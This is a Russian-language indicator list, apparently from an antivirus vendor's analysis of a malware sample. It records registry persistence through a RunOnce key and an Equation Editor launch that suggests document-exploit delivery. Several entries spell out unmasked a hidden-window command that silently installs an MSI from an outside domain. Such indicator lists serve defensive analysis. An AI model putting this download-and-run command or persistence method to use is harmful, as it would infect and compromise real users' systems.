Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'Startup key' = '%HOMEPATH%\subfolder1\taskmgr.vbs'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i https://cheapjerseysangels.com/turlou.msi /quiet
- taskmgr.exe
- %HOMEPATH%\subfolder1\taskmgr.exe
- %HOMEPATH%\subfolder1\taskmgr.vbs
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'ch#####rseysangels.com':443
- 'co###pt4u.co.il':443
- DNS ASK ch#####rseysangels.com
- DNS ASK co###pt4u.co.il
- '%WINDIR%\installer\msi29cf.tmp'
- '%HOMEPATH%\subfolder1\taskmgr.exe'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i https://cheapjerseysangels.com/turlou.msi /quiet' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i https://cheapjerseysangels.com/turlou.msi /quiet